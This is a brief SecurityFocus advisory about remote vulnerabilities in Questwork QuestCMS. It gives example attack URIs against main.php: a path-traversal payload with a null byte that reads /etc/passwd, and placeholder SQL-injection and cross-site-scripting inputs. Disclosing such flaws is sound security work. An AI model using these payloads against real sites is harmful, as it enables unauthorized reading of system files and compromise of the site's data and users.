Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

Questwork QuestCMS Multiple Remote Vulnerabilities

An attacker can exploit these issues via a browser. To exploit some of these issues, the attacker must entice an unsuspecting victim into following a malicious URI.

The following example URIs are available:

http://www.example.com/questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html

http://www.example.com/questcms/main/main.php?obj=[sql]

http://www.example.com/questcms/main/main.php?cx=[Xss]







 

Privacy Statement
Copyright 2008, SecurityFocus